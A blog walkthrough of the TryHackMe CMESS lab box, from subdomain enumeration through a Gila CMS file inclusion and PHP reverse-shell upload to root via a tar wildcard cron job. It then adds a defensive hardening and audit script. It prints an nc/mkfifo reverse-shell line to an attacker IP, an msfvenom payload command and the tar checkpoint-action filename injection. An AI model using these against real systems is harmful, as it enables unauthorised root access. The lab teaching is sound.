TryHackMe’s CMESS walkthrough


This is going to be a simple walkthrough on how I did the CMESS box on TryHackMe.com. The privilege escalation demonstrates a really good use of wildcard exploitation. The creator of the box is Optional, and thank you to him for creating an awesome, fun box.

Let’s g3t 4 Sh3ll

First things first, we’re told to add the hostname to our /etc/hosts file.

So, kicking off the box with an nmap scan, we see only ports 80 and 22 open.

Heading over to port 80, we see a simple and pretty empty home page.

Running gobuster on the site gives us quite a few entries back.

As well as directories, we should always enumerate for any subdomains; for that I used a tool called wfuzz.

Here we see that we got a subdomain back, so add this entry to the hosts file as well so we can browse to it.

Upon going to our newfound subdomain we see a conversation between the user andre and support. These are both email addresses, or possible usernames, that we could use in the future, so make a note of them.

We also see that the support user has reset andre’s password, so let’s take that and see if we can use it anywhere. Looking back at our gobuster output we can see we have an /admin directory. Let’s take a look.

We find a login page that takes an email and a password. These we have, so let’s try it.

And we get logged in. Straight away we see a “Gila CMS version”, so let’s take a look to see if there are any exploits for it.

Searchsploit shows that there is an LFI (Local File Inclusion) for this version, so let’s take a look using

searchsploit -x <exploit-path>

Let’s see if we can use the last bit of this URL in the CMS we have access to and see if it returns anything.

Append this to the end of our URL.

Okay, great! We see we have some type of directory listing now with some upload functionality, so let’s see if we can upload a shell.

We manage to upload a payload, which goes into the “assets” directory. Let’s start a listener and then browse to http://cmess.thm/assets/php-reverse-shell.php to get the server to process the payload.

Awesome, we have a shell as www-data. Looking around we see we can’t get into the andre directory, so our next step is lateral movement to andre.

Lat3ral m0ve to Andre u5er…

Let’s head over to the /tmp directory and grab linenum.sh to see what we can do as the www-data user, and maybe find anything interesting.

Grab the linenum.sh file
“python3 -m http.server” to serve the request for “le.sh” (linenum.sh)

Kicking this off with “./le.sh -t”. The “-t” is for thorough testing; we then see in the results some interesting files lurking about.

This looks interesting, so let’s take a look.

Awesome, we found a password!! Let’s see if we can now SSH to the box as andre 😀

Awesome, let’s grab user.txt while we’re here 🙂

L3ts g3t R00T!

Nice, we got user!! Let’s repeat the LinEnum process and see if we can do anything else new. However, this time I’m going to use an “upgraded” version of LinEnum called LinPEAS. This does the same thing as LinEnum and some more…

LinPEAS has a wicked awesome colour scheme for quickly hunting out privilege escalation points! So let’s begin the hunt.

Looking into our results from LinPEAS we see that it’s flagged a cronjob that runs as root every 2 mins.

This job is running a tar command to back up the andre user’s “backup” directory and everything in it.

Because this tar job is running with the “*” wildcard parameter, we can do a wildcard exploit: the shell expands the “*” into whatever filenames are in the directory before tar ever runs, so a filename that looks like an option gets parsed by tar as one. Googling around we find this: https://www.hackingarticles.in/exploiting-wildcard-for-privilege-escalation/ – these guys do a great job explaining the exploit, better than me at least.

We need to create 2 directories and a shell.sh file inside the /home/andre/backup directory that tar will see and interpret as commands and execute. SUCKAA!

msfvenom -p cmd/unix/reverse_netcat lhost=ATTACKER-IPADDRESS lport=ATTACKER-PORT R
Msfvenom to create a payload
Start our listener for this payload

Heading over to the directory that’s going to be backed up by tar, we see a little note.

Let’s now echo our payload into “shell.sh” and create the 2 directories needed for this exploit.

echo "mkfifo /tmp/obizbxg; nc 10.8.5.236 9009 0</tmp/obizbxg | /bin/bash >/tmp/obizbxg 2>&1; rm /tmp/obizbxg" > shell.sh
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1

Now we wait for the cron job to run, and we should get tar to interpret those commands and execute our shell.sh file.

Run “date” to see the system’s time.

Woop Woop, we got our shell back from the box!

This was a great box and really demonstrated the issues behind using wildcards in automated jobs or scripts, and how a hacker can leverage these vulnerabilities to gain higher privileges.
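The defensive side of that lesson, as an added example that is not part of the original post or of the box itself: the backup job rewritten so that a filename can never reach tar as an option, plus a small audit check for option-looking names in the directory being backed up. It assumes the root cron entry looked like the constructed line quoted in the comment (the post describes the job but never shows it); the decoy filenames in the demo are the ones the post creates, with a harmless marker script standing in for the reverse shell.

```shell
#!/bin/sh
# Added example, not from the original walkthrough or the box itself.
# Assumption (the post describes the job but does not quote it): the root cron
# entry looked something like this constructed line:
#   */2 * * * * root cd /home/andre/backup && tar -zcf /tmp/backup.tar.gz *
# The unquoted * is expanded by the shell before tar runs, so a file literally
# named "--checkpoint=1" arrives on tar's command line as an argument and is
# parsed as an option rather than archived as a file.
set -e

# Hardened form: archive the directory CONTENTS by path, never by glob.
# With "-C DIR ." every member name starts with "./", so a file called
# "--checkpoint=1" reaches tar only as the path "./--checkpoint=1".
safe_backup() {
    src_dir="$1"
    archive="$2"
    tar -cf "$archive" -C "$src_dir" .
}

# Audit: count entries in DIR whose names begin with "-". Such names are a
# strong signal that someone is staging argument injection against a
# wildcard-driven job; an alert on a backup directory can key on this.
count_option_like_names() {
    dir="$1"
    n=0
    for f in "$dir"/-*; do
        # An unmatched glob stays literal, so check the entry really exists.
        if [ -e "$f" ]; then
            n=$((n + 1))
        fi
    done
    echo "$n"
}

# How many members of ARCHIVE have exactly the member name NAME.
archive_member_count() {
    archive="$1"
    name="$2"
    tar -tf "$archive" | grep -Fxc -- "$name" || true
}

# Demonstration on constructed data in a temporary directory.
demo() {
    work=$(mktemp -d)
    mkdir "$work/backup"
    echo "real data" > "$work/backup/notes.txt"
    # Constructed decoys of the kind the post creates. shell.sh is a harmless
    # placeholder that only leaves a marker if anything ever executes it.
    echo 'touch ./RAN' > "$work/backup/shell.sh"
    : > "$work/backup/--checkpoint=1"
    : > "$work/backup/--checkpoint-action=exec=sh shell.sh"

    echo "option-looking names in backup dir: $(count_option_like_names "$work/backup")"
    safe_backup "$work/backup" "$work/backup.tar"
    echo "archive members:"
    tar -tf "$work/backup.tar"
    if [ -e "$work/backup/RAN" ]; then
        echo "shell.sh ran (unexpected)"
    else
        echo "shell.sh did not run: the decoy names were archived as plain files"
    fi
    rm -rf "$work"
}

demo
```

Run it as a plain sh script: the demo reports two option-looking names, lists the archive members (all prefixed with `./`), and confirms the marker script was never executed. The `-C DIR .` form, or an explicit path list via `find ... -print0 | tar --null -T -`, is what the cron entry should use instead of a bare `*`; the audit loop is cheap enough to run from the same cron minute, before the backup, and alert when it returns anything other than 0.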

4 thoughts on “TryHackMe’s CMESS walkthrough”

  1. you can also do

    echo "cat /root/root.txt > /tmp/test.txt; chown andre:andre /tmp/test.txt" > shell.sh

    then just cat /tmp/test.txt … easy. Nice writeup though.

  2. Thank you for the write-up. Watch out for typos in commands when you copy-paste (“mkinfo” typo, but mkfifo detailed in screenshot).
